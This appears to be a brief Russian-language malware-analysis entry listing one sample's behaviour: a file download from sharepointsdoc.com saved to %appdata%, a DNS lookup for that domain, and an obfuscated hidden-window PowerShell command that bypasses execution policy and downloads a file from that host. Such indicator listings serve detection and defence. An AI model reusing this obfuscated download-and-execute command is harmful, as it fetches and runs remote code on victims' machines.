Техническая информация
- http://sharepointsdoc.com/sharesexcel.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^HElL.EXE -^ExeCu^TIoNP^OLIcY By^Pa^S^s ^-NO^PROFi^LE -^WIndOwst^YLE HIdD^En^ (n^ew^-^ob^j^E^cT SySTEM.nEt^.W^e^b^CL^i^Ent).doWN^lO^adFil^E(^'http://sharepointsdoc.com...
- DNS ASK sh####ointsdoc.com
- '<SYSTEM32>\cmd.exe' /C "p^OwE^RS^HElL.EXE -^ExeCu^TIoNP^OLIcY By^Pa^S^s ^-NO^PROFi^LE -^WIndOwst^YLE HIdD^En^ (n^ew^-^ob^j^E^cT SySTEM.nEt^.W^e^b^CL^i^Ent).doWN^lO^adFil^E(^'http://sharepointsdoc.com...' (со скрытым окном)